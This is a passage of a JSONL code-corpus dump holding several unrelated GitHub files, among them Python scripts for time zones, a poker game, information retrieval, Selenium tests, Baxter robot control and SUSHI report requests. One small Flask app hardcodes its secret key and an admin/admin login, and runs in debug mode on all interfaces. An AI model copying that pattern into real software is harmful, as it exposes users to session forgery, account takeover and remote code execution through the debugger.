formattazzione:\\n\",current_time,\"\\n\") #Stampa della data senza formattazzione\r\nprint(\"Data e Orario in formato italiano:\\n\", italian_format_datetime,\"\\n\") #Stampa della data con formattazzione italiana\r\n\r\n\r\n#Date e Orari non locali\r\ncurrent_time_Nairobi = current_time.astimezone(ZoneInfo(\"Africa/Nairobi\"))\r\ncurrent_time_Tokyo = current_time.astimezone(ZoneInfo(\"Asia/Tokyo\"))\r\n\r\n#Viene chiamata la funzione di formattazione passando l'ora attuale di Los Angeles\r\nitalian_format_datetime_Nairobi = datetime_formatter(current_time_Nairobi)\r\n\r\n#Viene chiamata la funzione di formattazione passando l'ora attuale di Tokyo\r\nitalian_format_datetime_Tokyo = datetime_formatter(current_time_Tokyo)\r\n\r\nprint(\"Data e Orario in formato italiano di Nairobi:\\n\",italian_format_datetime_Nairobi,\"\\n\") #Stampa della data con formattazzione italiana\r\n\r\nprint(\"Data e Orario in formato italiano di Tokyo:\\n\",italian_format_datetime_Tokyo,\"\\n\") #Stampa della data con formattazzione italiana\r\n","repo_name":"SpaghettiHacks/Codici_Post","sub_path":"TimeZone/TiemZone.py","file_name":"TiemZone.py","file_ext":"py","file_size_in_byte":1682,"program_lang":"python","lang":"it","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"9066248156","text":"\nfrom IPython.display import HTML, display, YouTubeVideo\n\ndef prefix(url):\n prefix = '' if url.startswith('http') else 'http://'\n return prefix + url\n\n\ndef simple_link(url, name=None):\n name = url if name is None else name\n url = prefix(url)\n return '%s' % (url, name)\n\n\ndef html_link(url, name=None):\n return HTML(simple_link(url, name))\n\n\n# Utility functions\ndef website(url, name=None, width=800, height=450):\n html = []\n name = url if name == 'auto' else name\n if name:\n html.extend(['
',\n simple_link(url, name),\n '
'] )\n\n html.append('')\n return HTML('\\n'.join(html))\n\n\ndef nbviewer(url=None, gist=None, name=None, width=800, height=450):\n if url:\n return website('nbviewer.ipython.org/url/' + url, name, width, height)\n elif gist:\n return website('nbviewer.ipython.org/' + str(gist), name, width, height)\n\n","repo_name":"ellisonbg/talk-2014-strata-sc","sub_path":"talktools.py","file_name":"talktools.py","file_ext":"py","file_size_in_byte":1084,"program_lang":"python","lang":"en","doc_type":"code","stars":74,"dataset":"github-code","pt":"53"} +{"seq_id":"20558337149","text":"from django.contrib.auth.models import User\nfrom django.test import TestCase\nfrom tastypie.test import ResourceTestCaseMixin\n\nfrom tests.utils import get_api_key, get_api_url\n\n\nclass ProfileUpdateResourceTest(ResourceTestCaseMixin, TestCase):\n fixtures = ['tests/test_user.json',\n 'tests/test_oppia.json',\n 'tests/test_permissions.json']\n\n def setUp(self):\n super(ProfileUpdateResourceTest, self).setUp()\n self.username = 'demo'\n self.user = User.objects.get(username=self.username)\n self.api_key = get_api_key(user=self.user).key\n self.base_data = {\n 'email': 'demo@me.com',\n 'first_name': 'demo',\n 'last_name': 'user',\n 'organisation': ''\n }\n self.url = get_api_url('v1', 'profileupdate')\n\n def get_credentials(self):\n return self.create_apikey(username=self.username, api_key=self.api_key)\n\n def test_edit_own_profile_user(self):\n orig_firstname = self.user.first_name\n new_firstname = 'Hernan'\n\n orig_lastname = self.user.last_name\n new_lastname = 'Cortez'\n\n orig_org = self.user.userprofile.organisation\n new_org = 'my organisation'\n\n post_data = self.base_data.copy()\n post_data['first_name'] = new_firstname\n post_data['last_name'] = new_lastname\n post_data['organisation'] = new_org\n\n response = self.api_client.post(self.url,\n format='json',\n data=post_data,\n authentication=self.get_credentials())\n self.assertHttpCreated(response)\n\n updated_user = User.objects.get(username=self.username)\n self.assertNotEqual(orig_firstname, updated_user.first_name)\n self.assertNotEqual(orig_lastname, updated_user.last_name)\n self.assertNotEqual(orig_org, updated_user.userprofile.organisation)\n","repo_name":"DigitalCampus/django-oppia","sub_path":"tests/api/v1/test_profile_update.py","file_name":"test_profile_update.py","file_ext":"py","file_size_in_byte":1963,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"53"} +{"seq_id":"14074084007","text":"import flask\nfrom flask import render_template, url_for, flash, redirect\n\nfrom forms import RegistrationForm, LoginForm\n\n\napp = flask.Flask(__name__)\n\napp.config['SECRET_KEY'] = '5791628bb0b13ce0c676dfde280ba245'\n\nproducts = [\n {\n 'author' : 'Ruben Barcelo',\n 'product' : 'Coche',\n 'units' : '2',\n 'date_posted' : 'April 20, 2018'\n },\n{\n 'author' : 'Carlos Jimenez',\n 'product' : 'Moto',\n 'units' : '1',\n 'date_posted' : 'May 25, 2018'\n }\n]\n\n@app.route('/')\n@app.route('/home')\ndef home():\n return render_template('home.html', products=products)\n\n@app.route('/register', methods=['GET', 'POST'])\ndef register():\n form = RegistrationForm()\n if form.validate_on_submit():\n flash(f'Has creado la cuenta para {form.username.data}!', 'success')\n return redirect(url_for('home'))\n\n return render_template('register.html', title='Register', form=form)\n\n@app.route('/login', methods=['GET', 'POST'])\ndef login():\n form = LoginForm()\n if form.validate_on_submit():\n if form.email.data == 'admin@admin.com' and form.password.data == 'admin':\n flash(f'Has iniciado sesion correctamente!', 'success')\n return redirect(url_for('home'))\n else:\n flash(f'Error al iniciar sesion!', 'danger')\n\n return render_template('login.html', title='Login', form=form)\n\napp.run(host=\"0.0.0.0\", port=5000, debug=True)\n\n","repo_name":"rafer1998/AD-FIB","sub_path":"test/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1437,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"14354484299","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# # Online News Shares\n\n# ## Importing the libraries\n\n# In[5]:\n\n\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport pandas as pd\nimport seaborn as sns\n\n\n# ## Importing the dataset\n\n# In[6]:\n\n\nget_ipython().run_line_magic('matplotlib', 'inline')\nsns.set_style('whitegrid')\ndf = pd.read_csv('OnlineNewsPopularity.csv')\ndf.head(5)\n\n\n# In[7]:\n\n\ndf= df.drop(['url', ' timedelta'], axis=1)\ndf= df.iloc[:,[24,25,28,39,40,58]]\n\n\n# ## Pair wise scatter plots \n\n# In[8]:\n\n\nsns.pairplot(df)\nListAttr = []\nlengthOfList = len(df)\nfor i in df:\n print(i)\n ListAttr.append(i)\nprint(len(ListAttr)) \n\n","repo_name":"Garima-che/Machine-Learning-UHFall-2020","sub_path":"Comparison of NN and LR/HW4Q2_scatterplot.py","file_name":"HW4Q2_scatterplot.py","file_ext":"py","file_size_in_byte":638,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"27188245578","text":"from time import sleep\n\nfrom rich.table import Table\nfrom rich.console import Console\nfrom rich.columns import Columns\nfrom rich.panel import Panel\n\n\nfrom poker.utils.constants import (\n BetAction,\n Decision, \n Cash,\n Blind, \n COMPETITION, \n PLAYER_NAME,\n GAME_DELAY,\n PLAYER_TABLE_COLUMNS,\n FIRST_PLAYER,\n HIDDEN,\n TIE\n)\nfrom poker.utils.exception import (\n RangeException, \n CashException, \n InvalidActionException, \n NegativeException,\n InsufficientChipException\n)\nfrom poker.utils.chip import GameStack\nfrom poker.utils.card import Card\n\n\nclass GameMessage:\n\n def __init__(self) -> None:\n self.cash_options = [item.value for item in Cash]\n self.decision = [item.value for item in Decision]\n\n def play(self) -> bool:\n player_response = input(\"Welcome to Texas hold'em! Would you like to play a game? [yes/no] \").lower()\n if player_response in [Decision.Y.value, Decision.YES.value]:\n return True\n return False \n \n def starting_cash(self) -> int:\n try:\n player_response = int(input(f\"How much money would you like to start off with? {self.cash_options} \"))\n if player_response not in self.cash_options:\n raise CashException\n return player_response\n except (ValueError, CashException) as err:\n print(err)\n player_response = self.starting_cash()\n return player_response\n \n def competition_count(self) -> int:\n try:\n count = int(input(f\"How many players would you like to play against? {COMPETITION} \"))\n if count not in COMPETITION:\n raise RangeException\n return count\n except (ValueError, RangeException) as err:\n print(err)\n count = self.competition_count()\n return count\n\n def raise_response(self, raise_amount: int, chip_count: int) -> str:\n try:\n player_response = input(f\"The bet was raised by {raise_amount}, what would you like to do? [{BetAction.CALL.value} or {BetAction.FOLD.value}] \").lower()\n if player_response not in [BetAction.CALL.value, BetAction.FOLD.value]:\n raise InvalidActionException(valid_actions=[BetAction.CALL.value, BetAction.FOLD.value])\n if raise_amount > chip_count and player_response != BetAction.FOLD.value:\n raise InsufficientChipException(chip_count=chip_count)\n return player_response\n except (InvalidActionException, InsufficientChipException) as err:\n print(err)\n player_response = self.raise_response(raise_amount=raise_amount, chip_count=chip_count)\n return player_response\n\n def action(self, chip_count: int) -> str:\n if chip_count == 0:\n valid_actions = [BetAction.CHECK.value, BetAction.FOLD.value]\n else:\n valid_actions = [BetAction.CHECK.value, BetAction.RAISE.value, BetAction.FOLD.value]\n\n try:\n player_response = input(f\"What would you like to do? [{', '.join(valid_actions)}] \").lower()\n if player_response not in valid_actions:\n raise InvalidActionException(valid_actions=valid_actions)\n return player_response\n except InvalidActionException as err:\n print(err)\n player_response = self.action()\n return player_response\n\n def action_taken(self, name: str, action: str, amount: int, possible_actions: list[str] = []) -> None:\n print(f\"{name} decided to {action} {amount if action in possible_actions else ''}\") \n \n def increase(self, chip_count: int) -> int:\n try:\n player_response = int(input(f\"How much would you like to raise? \"))\n if player_response < 0:\n raise NegativeException\n if player_response > chip_count:\n raise InsufficientChipException(chip_count=chip_count)\n return player_response\n except (ValueError, NegativeException, InsufficientChipException) as err:\n print(err)\n player_response = self.increase(chip_count=chip_count)\n return player_response\n \n def player_summary(self, players: dict) -> None:\n player_table = Table(title=\"Player Summary\")\n\n for column in PLAYER_TABLE_COLUMNS:\n player_table.add_column(column)\n\n for player_id, player in players.items():\n player = player[\"player\"]\n player_order = str(player_id)\n player_name = player.name \n player_chips = f\"{GameStack.white['name']}: {player.stack.chips[GameStack.white['name']]}\"\n player_blind = Blind.BIG.name if player_id == FIRST_PLAYER else Blind.SMALL.name\n\n player_pocket_cards = HIDDEN \n if player.name == PLAYER_NAME or len(player.best_hand) > 1:\n player_pocket_cards = \" \".join(f\"{card}\" for card in player.pocket_cards) \n \n player_best_hand = \"\"\n short_name = \"\"\n if len(player.best_hand) > 1:\n player_best_hand = \", \".join(f\"{card}\" for card in player.best_hand[\"hand\"]) \n short_name = player.best_hand[\"short\"]\n \n player_table.add_row(\n player_order, \n player_name, \n player_chips,\n player_blind,\n player_pocket_cards,\n player_best_hand,\n short_name\n )\n \n console = Console()\n console.print(\"\", player_table)\n \n def game_progression_prompt(self, progress: bool = None) -> None:\n if progress:\n player_response = input(f\"How about now, are you ready? [yes/no] \").lower()\n else:\n player_response = input(f\"Are you ready to continue? [yes/no] \").lower()\n \n if player_response not in self.decision:\n sleep(GAME_DELAY)\n self.game_progression_prompt()\n if player_response in [Decision.N.value, Decision.NO.value]:\n sleep(GAME_DELAY)\n self.game_progression_prompt(progress=True) \n\n def game_summary(self, pot: GameStack, community_cards: list) -> None:\n game_pot = [Panel(f\"Game Pot\\n{key}: {value}\") for key, value in pot.chips.items()]\n game_pot.extend(Panel(f\"Card {card_number + 1}\\n{community_cards[card_number]}\") for card_number in range(len(community_cards)))\n console = Console()\n console.print(Columns(game_pot))\n\n def showdown(self, winner: dict, pot: GameStack, players: dict, community_cards: list[Card]) -> None:\n sleep(GAME_DELAY)\n self.game_summary(pot=pot, community_cards=community_cards)\n sleep(GAME_DELAY)\n self.player_summary(players=players)\n sleep(GAME_DELAY)\n\n if len(winner) > TIE:\n winners = len(winner) // 2\n winnings = pot.cash_equivalent() / winners\n winners_names = []\n for key, value in winner.items():\n if \"name\" in key:\n winners_names.append(value)\n winners_names_string = \", \".join(winners_names)\n print(f\"\\nWe have a tie! Congratulations {winners_names_string}! You each won ${winnings}!\")\n \n if len(winner) == TIE:\n if winner[\"name\"] == PLAYER_NAME:\n print(f\"\\nCongratulations you won ${pot.cash_equivalent()}!\")\n else:\n print(f\"\\nCongratulations {winner['name']}! You won ${pot.cash_equivalent()}!\")","repo_name":"BenGriffith/poker","sub_path":"poker/utils/message.py","file_name":"message.py","file_ext":"py","file_size_in_byte":7615,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"40051696415","text":"# link to problem: https://www.hackerrank.com/challenges/30-binary-numbers/problem\n\nn = int(input().strip())\npower = 0\nbinary_str = ''\nwhile 2 ** power <= n:\n power += 1\npower -= 1\n\nwhile power >= 0:\n if n - 2 ** power >= 0:\n n = n - 2 ** power\n binary_str += '1'\n else:\n binary_str += '0'\n power -= 1\n\nbinary_list = filter(lambda x: x != '', binary_str.split('0'))\nprint(len(max(binary_list)))","repo_name":"L-Ignatova/hacker-rank-challenges","sub_path":"thirtydaysofcode/day10.py","file_name":"day10.py","file_ext":"py","file_size_in_byte":427,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"29415382621","text":"import os\nimport json\nimport math\nfrom nltk.tokenize import word_tokenize\nfrom nltk.corpus import stopwords\nfrom nltk.stem import WordNetLemmatizer\n\n## Config\n\nDATASET_DIR = 'dataset'\nOUTPUT_FILENAME = 'vsm.json'\n\n\n## Globals\n\ninverted_index = dict()\ndocs = list()\nLEMMATIZER = WordNetLemmatizer()\nSTOP_WORDS = set(stopwords.words('english'))\n\n## Generate Inverted Index and output as JSON\n\ndef normalize(word):\n output = word.lower() # Case Folding\n if output in STOP_WORDS or not word.isalnum(): # Stop Word & Punctuation Removal\n return None\n return LEMMATIZER.lemmatize(output) # Lemmatization\n\ndef save_as_json(data):\n with open(OUTPUT_FILENAME, 'w') as output_file:\n json.dump(data, output_file)\n \n\ndef generate_inverted_index(dataset_dir):\n print('Generation of inverted index started ...')\n # List all .txt documents in the directory\n documents = [ document for document in os.listdir(dataset_dir) if document.endswith('.txt') ]\n for document in documents:\n docs.append(document.replace('.txt', ''))\n doc_id = len(docs) - 1\n\n with open(f'{dataset_dir}/{document}', 'r') as input_file:\n raw_data = input_file.read()\n\n # Step 1: Tokenize words\n words = word_tokenize(raw_data)\n\n for i in range(len(words)):\n word = words[i]\n # Step 2: Normalize Words\n processed_word = normalize(word)\n if processed_word is None:\n continue\n \n # Step 3: Add to inverted index\n if processed_word not in inverted_index.keys():\n inverted_index[processed_word] = {}\n if doc_id not in inverted_index[processed_word].keys():\n inverted_index[processed_word][doc_id] = 0\n inverted_index[processed_word][doc_id] += 1\n\n save_as_json(inverted_index)\n print(f'Inverted index saved as {OUTPUT_FILENAME}!!')\n\n## Parsing Queries\ndef generate_query_index_ltn(query):\n # Calculates ltn -> logarithmic tf - idf score(not normalized)\n # for the query terms \n query_index = {}\n words = word_tokenize(query)\n\n for i in range(len(words)):\n word = words[i]\n processed_word = normalize(word)\n if processed_word is None:\n continue\n\n if processed_word not in query_index and processed_word in inverted_index:\n # Keep only words that are also present in Inverted Index\n query_index[processed_word] = 0\n query_index[processed_word] += 1\n \n for term in query_index:\n tf = query_index[term]\n df = len(inverted_index[term])\n query_index[term] = (1 + math.log10(tf)) * math.log10(len(docs) / df)\n return query_index\n\ndef use_second(elem):\n return elem[1]\n\ndef parse(query):\n vsm = [] # format: [(doc_id, score), ...]\n query_index = generate_query_index_ltn(query)\n for i in range(len(docs)):\n weights = {}\n normalizer = 0\n for term in query_index:\n tf = 0 if i not in inverted_index[term].keys() else inverted_index[term][i]\n weight = 0 if tf == 0 else 1 + math.log10(tf)\n weights[term] = weight\n normalizer += weight ** 2\n normalizer = normalizer ** 0.5\n \n if normalizer == 0:\n continue\n \n score = 0\n for term in query_index:\n score += query_index[term] * (weights[term] / normalizer)\n vsm.append((i, score))\n sorted_vsm = sorted(vsm, key=use_second, reverse=True)\n sorted_ids = [sorted_vsm[i][0] for i in range(len(sorted_vsm))]\n return sorted_ids\n\n \nif __name__ == '__main__':\n generate_inverted_index(DATASET_DIR)\n\n while True:\n query = input('Enter your query(q to quit):')\n if query.lower() == 'q':\n break\n else:\n output_ids = parse(query) # These will be ranked in order\n print('\\n### Relevant Documents ### \\n')\n no_of_docs_printed = len(output_ids) if len(output_ids) < 10 else 10\n for i in range(no_of_docs_printed):\n print(docs[output_ids[i]])\n print()\n\n print('Exiting ....')\n ","repo_name":"prakamya-mishra/Information-Retrieval","sub_path":"3_vsm.py","file_name":"3_vsm.py","file_ext":"py","file_size_in_byte":3884,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"11652462581","text":"import sqlite3\nimport datetime\n\n# connect to the database\nconn = sqlite3.connect('people.db')\nc = conn.cursor()\n\nquery = \"SELECT first_name, age FROM people WHERE age >= 50 LIMIT 20\"\n\nc.execute(query)\n\nresults = c.fetchall()\n\nprint(\"Old People:\")\n\nfor name, age in results:\n print(f\"{name} is {age} years old.\")\n\nconn.close()\n","repo_name":"sha2003ca/COMP593-Lab7","sub_path":"python old_people.py","file_name":"python old_people.py","file_ext":"py","file_size_in_byte":329,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"38052924200","text":"from flask import Flask\r\n\r\nfrom .database.connection import *\r\nfrom .import create_app\r\napp = Flask(__name__)\r\n\r\napp = create_app()\r\n\r\ntry:\r\n db = initialize_db()\r\n connection = db.connect()\r\n\r\n Session = sessionmaker(bind=db)\r\n session = Session()\r\n\r\nexcept ValueError as e:\r\n print(e)","repo_name":"Trouttt/flask_modular_template","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":301,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"70220304489","text":"from selenium.webdriver.support.wait import WebDriverWait\nfrom selenium.webdriver.support import expected_conditions as EC\nfrom selenium.webdriver.common.by import By\nfrom locators_testdata import configReader\n\n\nclass BaseDriver:\n \n def __init__(self,driver):\n self.driver =driver\n \n ## This is explicit wait \n def global_wait_explicit_single_elemnt(self,wait,locator):\n # list_element = self.wait.until(EC.presence_of_all_elements_located((By.locator_type,locator)))\n # self.wait.until(EC.presence)\n # wait_val = self.WebDriverWait(self.driver, wait).wait_val.until(EC.presence_of_element_located(locator_type,locator))\n wait_va = WebDriverWait(self.driver,wait)\n elem = wait_va.until(EC.visibility_of_element_located((By.XPATH,locator)))\n return elem\n \n ## This is entering data in text field \n def text_field_entered(self,locator,testdata):\n generic_wait = configReader.readConfigData('Details', 'globalWait')\n user__entered = self.global_wait_explicit_single_elemnt(generic_wait,locator)\n final_value = user__entered.send_keys(testdata)\n return final_value\n \n \n # self.driver.find_element(\"xpath\",locator).send_keys(testdata)\n # return wait_for_ele\n \n ## This is generic hyperlink \n def click_hyperlink(self,locator):\n generic_wait = configReader.readConfigData('Details', 'globalWait')\n user_click = self.global_wait_explicit_single_elemnt(generic_wait,locator)\n user_click.click()\n \n ### logic to extract data from table \n def tble_data_verify(self):\n columns = len(self.driver.find_elements(By.XPATH,\"//table[contains(@id,'_ctl0__ctl0_Content_Main_MyTransactions')]//tr[1]//td\"))\n rows = len(self.driver.find_elements(By.XPATH,\"//table[contains(@id,'_ctl0__ctl0_Content_Main_MyTransactions')]//tr\"))\n print(\"rows - \",rows) # rows - 3\n print(\"columns - \",columns) #columns - 4\n for row in range(1,rows):\n # print(row)\n for col in range(1,columns+1):\n values = self.driver.find_element(By.XPATH,\"//table[contains(@id,'_ctl0__ctl0_Content_Main_MyTransactions')]//tr[\"+str(row)+\"]//td[\"+str(col)+\"]\").text\n open('../utitlity/table.txt','w+').write(values)\n\n \n # print(f\"Dynamic web table index {row}, ---> {col}, --------> {values}\",end=\"\")\n # print(values,end=\"\")\n # print(type(values))\n # if (values.find(dataMatch)== 1):\n # assert True\n # break\n \n # values = self.driver.find_element(By.XPATH,\"//table[contains(@id,'_ctl0__ctl0_Content_Main_MyTransactions')]//tr[\"+str(row+1)+\"]//td[\"+str(col+1)+\"]\").text\n # print(valuesF,end=\" \")\n # else:\n # value_ele = self.driver.find_element(By.XPATH,\"//table[contains(@id,'_ctl0__ctl0_Content_Main_MyTransactions')]//tr[\"+str(row-1)+\"]//td[\"+str(col-1)+\"]\").text\n # print(value_ele,end=\"\")\n # generic_wait = configReader.readConfigData('Details', 'globalWait')\n # table_data = self.driver.find_element(\"xpath\",table_locator)\n # # rows=str(table_data.find_elements(By.TAG_NAME,\"tr\"))\n # # table_id = driver.find_element(By.ID, 'data_configuration_feeds_ct_fields_body0')\n # rows = table_data.find_elements(By.TAG_NAME, \"tr\") \n # # get all of the rows in the table\n # for row in rows:\t\n # # Get the columns (all the column 2) \n # #note: index start from 0, 1 is col 2\n # col = row.find_elements(By.TAG_NAME, \"td\")\n # print(col.text) #prints text from the element\n\n # for row in rows[1:]:\n # cells=row.find_elements(By.TAG_NAME,\"td\")\n # transaction_ID,transaction_Time,account_ID,action,amount = [cell.text for cell in cells]\n # print(f\"Transaction ID is {transaction_ID}, Transaction Time is {transaction_Time}, account ID is {account_ID}, Action is {action}, Amount is {amount} \")\n # return transaction_ID,transaction_Time,account_ID,action,amount\n \n \n def cap_screenshot(self,file):\n return self.driver.save_screenshot(file)","repo_name":"akhi1212/POM_datadriven","sub_path":"BaseClass/base_driver.py","file_name":"base_driver.py","file_ext":"py","file_size_in_byte":4294,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"34380283446","text":"from cibyl.cli.argument import Argument\nfrom cibyl.models.model import Model\n\n# pylint: disable=no-member\n\n\nclass Package(Model):\n \"\"\" Model for packages found on Openstack node.\"\"\"\n\n API = {\n 'name': {\n 'attr_type': str,\n 'arguments': []\n },\n 'origin': {\n 'attr_type': str,\n 'arguments': [Argument(name='--package-origin', arg_type=str,\n nargs=\"*\", func=\"get_deployment\",\n description=\"Package origin\")]\n }\n }\n\n def __init__(self, name: str, origin: str = None):\n super().__init__({'name': name, 'origin': origin})\n\n def merge(self, other):\n \"\"\"Merge the information of two package objects representing the\n same package.\n\n :param other: The Package object to merge\n :type other: :class:`.Package`\n \"\"\"\n if not self.origin.value:\n self.origin.value = other.origin.value\n","repo_name":"RedHatCRE/cibyl","sub_path":"cibyl/plugins/openstack/package.py","file_name":"package.py","file_ext":"py","file_size_in_byte":986,"program_lang":"python","lang":"en","doc_type":"code","stars":16,"dataset":"github-code","pt":"53"} +{"seq_id":"33565167610","text":"#!/usr/bin/env python\n\n# This program sends Baxter to specified position\n# Written by Jack Schultz\n# Created 1/11/22\n\nimport rospy\nimport baxter_interface\nimport sys\nimport pickle\nimport sys, getopt\n\nclass control_baxter():\n def __init__(self, limb, verbose=True):\n # Initialize parameters\n self._limb_name = limb\n self._verbose = False\n self._limb = baxter_interface.Limb(limb)\n self._gripper = baxter_interface.Gripper(limb)\n self._rs = baxter_interface.RobotEnable(baxter_interface.CHECK_VERSION)\n self._init_state = self._rs.state().enabled\n left = baxter_interface.Gripper('left', baxter_interface.CHECK_VERSION)\n if self._verbose:\n print(\"Getting robot state... \")\n print(\"Enabling robot... \")\n self._rs.enable()\n if self._verbose:\n print(\"Calibrating gripper...\")\n left.calibrate()\n\n # Node cycle rate (in Hz).\n self.loop_rate = rospy.Rate(100)\n\n # Robot Functions\n def move_to_angles(self, start_angles=None):\n # print(\"Moving the {0} arm to start pose...\".format(self._limb_name))\n if not start_angles:\n start_angles = dict(zip(self._joint_names, [0]*7))\n self._guarded_move_to_joint_position(start_angles)\n rospy.sleep(0.1)\n\n def _servo_to_pose(self, pose):\n # servo down to release\n joint_angles = self.ik_request(pose)\n self._guarded_move_to_joint_position(joint_angles)\n\n def _guarded_move_to_joint_position(self, joint_angles):\n if joint_angles:\n self._limb.move_to_joint_positions(joint_angles)\n else:\n rospy.logerr(\"No Joint Angles provided for move_to_joint_positions. Staying put.\")\n\ndef main(argv):\n\n rospy.init_node(\"send_baxter_home\")\n limb = 'left'\n\n run = control_baxter(limb)\n\n target = ''\n\n try:\n opts, args = getopt.getopt(argv,\"ht:\",[\"target=\",])\n except getopt.GetoptError:\n print('Usage: send_to.py -t ')\n print('Target Options: ')\n print(' - home')\n print(' - GPD')\n sys.exit(2)\n \n if len(opts) > 0:\n for opt, arg in opts:\n if opt == '-h':\n print('send_to.py -t ')\n sys.exit()\n elif opt in (\"-t\", \"--target\"):\n target = arg\n else:\n target = \"home\"\n else:\n target = \"home\"\n \n print('Target:', target)\n\n if target == \"GPD\":\n home_joint_angles = dict()\n home_joint_angles['left_e0'] = -0.4126408319411763\n home_joint_angles['left_e1'] = 1.6766410011587571\n home_joint_angles['left_s0'] = 0.3056456719861687\n home_joint_angles['left_s1'] = -1.358339987672534\n home_joint_angles['left_w0'] = 0.18331070415230694\n home_joint_angles['left_w1'] = 0.5495486172599495\n home_joint_angles['left_w2'] = -0.30833013836496814\n elif target == \"home\":\n # Read home position set in Calibration.py\n with open('/home/labuser/raf/set_positions/home_position.pkl', 'rb') as handle:\n home_joint_angles = pickle.load(handle)\n handle.close()\n else:\n print('Usage: send_to.py -t ')\n print('Target Options: ')\n print(' - home')\n print(' - GPD')\n sys.exit(2)\n\n run.move_to_angles(home_joint_angles)\n\n return 0\n\nif __name__ == '__main__':\n sys.exit(main(sys.argv[1:]))","repo_name":"chms-raf/raf-v1","sub_path":"scripts/send_to.py","file_name":"send_to.py","file_ext":"py","file_size_in_byte":3474,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"9391038865","text":"from lxml import etree\r\nfrom lxml import objectify\r\nimport requests as rq\r\nfrom pprint import pprint\r\nimport pandas as pd\r\nimport os\r\nimport calendar\r\nimport time\r\n\r\nimport pendulum\r\nimport collections\r\nimport datetime\r\nimport logging\r\nimport time\r\nimport uuid\r\n\r\n\r\nNS = {\r\n\t\t\"SOAP-ENV\": \"http://schemas.xmlsoap.org/soap/envelope/\",\r\n\t\t\"sushi\": \"http://www.niso.org/schemas/sushi\",\r\n\t\t\"sushicounter\": \"http://www.niso.org/schemas/sushi/counter\",\r\n\t\t\"counter\": \"http://www.niso.org/schemas/counter\",\r\n\t}\r\n\r\n\r\ndef add_sub(parent, tag, content):\r\n\ttemp = etree.SubElement(parent, tag)\r\n\ttemp.text = content\r\n\treturn temp\r\n\r\ndef spaceout(n = 2):\r\n\tfor i in range(n):\r\n\t\tprint()\r\n#\r\ndef view(parent_node):\r\n\tprint(\"************************************************************\")\r\n\tprint(etree.tostring(parent_node,pretty_print = True, encoding = 'unicode')) \t\t#look at the whole tree\r\n\tprint(\"************************************************************\")\r\n\r\n#############################################################################################################################\r\n#############################################################################################################################\r\n#\r\n#############################################################################################################################\r\ndef raw_xml_rep( lg, mnth = 3, yr = 2019, report = \"JR1\", release = 4):\r\n\t'''\r\n\t#Retrive the XML-formatted report from the given SUSHI server\r\n\tlg -> a 3-member tuple of strings that holds the SUSHI server's location and login credentials\r\n\t\tlg[0] -> (str) The SUSHI server URL\r\n\t\tlg[1] -> (str) The SUSHI requestor ID\r\n\t\tlg[2] -> (str) the SUSHI customer ID\r\n\tmnth -> (int) the month of the requested report\r\n\tyr -> (int) the year of the requested report\r\n\treport -> (str) the type of report requested\r\n\trelease -> (int) the COUNTER release of the requested report. Currently defaults to 4.\r\n\t'''\r\n\twsdl_url = lg[0]\r\n\tstart_date = datetime.date(yr,mnth,1)\r\n\tend_date = datetime.date(yr, mnth, calendar.monthrange(yr,mnth)[1])\r\n\trequestor_id = lg[1]\r\n\trequestor_email=None\r\n\trequestor_name=None\r\n\tcustomer_reference=lg[2]\r\n\tcustomer_name=None\r\n\t#report=\"JR2\" \t\t#tombstoned for testing\r\n\tsushi_dump=False\r\n\tverify=True\r\n\t#release = 4\t\t#tombstoned for testing\r\n\r\n\t#========================================================================\r\n\t#INITIALIZE VARIABLES AND CONTEXT VARIABLES\r\n\tNS = {\r\n\t\t\"SOAP-ENV\": \"http://schemas.xmlsoap.org/soap/envelope/\",\r\n\t\t\"sushi\": \"http://www.niso.org/schemas/sushi\",\r\n\t\t\"sushicounter\": \"http://www.niso.org/schemas/sushi/counter\",\r\n\t\t\"counter\": \"http://www.niso.org/schemas/counter\",\r\n\t}\r\n\t#=======================================================================\r\n\trooty = etree.Element(\"{%(SOAP-ENV)s}Envelope\" % NS, nsmap=NS)\t#This is the root of the tree that we're going to pass as the header to the SUSHI server.\r\n\tbody = etree.SubElement(rooty, \"{%(SOAP-ENV)s}Body\" % NS)\t\t#build the body node for the SUSHI request tree\r\n\ttimestamp = pendulum.now(\"UTC\").isoformat()\t\t\t\t\t\t#Timestamp the report request\r\n\trr = etree.SubElement(\r\n\t\tbody,\r\n\t\t\"{%(sushicounter)s}ReportRequest\" % NS,\r\n\t\t{\"Created\": timestamp, \"ID\": str(uuid.uuid4())},\r\n\t)\r\n\t#=======================================================\r\n\t\r\n\t#Create the XML outline that's going to be submitted with the POST request to the SUSHI server for population.\r\n\r\n\treq = etree.SubElement(rr, \"{%(sushi)s}Requestor\" % NS)\t# Link to the sushi schema and add this link into the etree with the 'Requestor' tag\r\n\trid = add_sub(req, \"{%(sushi)s}ID\" % NS, requestor_id)\t# Create a new subelement of 'req' tagged 'ID' containing the requestor ID\r\n\t#-----------\r\n\treq_name_element = add_sub(req, \"{%(sushi)s}Name\" % NS, requestor_name)\t\t#Create a child node of 'req' tagged 'Name', holding the requestor name (Institution name)\r\n\treq_email_element = add_sub(req, \"{%(sushi)s}Email\" % NS, requestor_email)\t#Create a child node of 'req' tagged 'Email', holding the requestor's provided email address\r\n\t#-----------\r\n\tcust_ref_elem = etree.SubElement(rr, \"{%(sushi)s}CustomerReference\" % NS)\t#Create a child node of 'req' tagged 'CustomerReference'\r\n\tci = add_sub(cust_ref_elem, \"{%(sushi)s}ID\" % 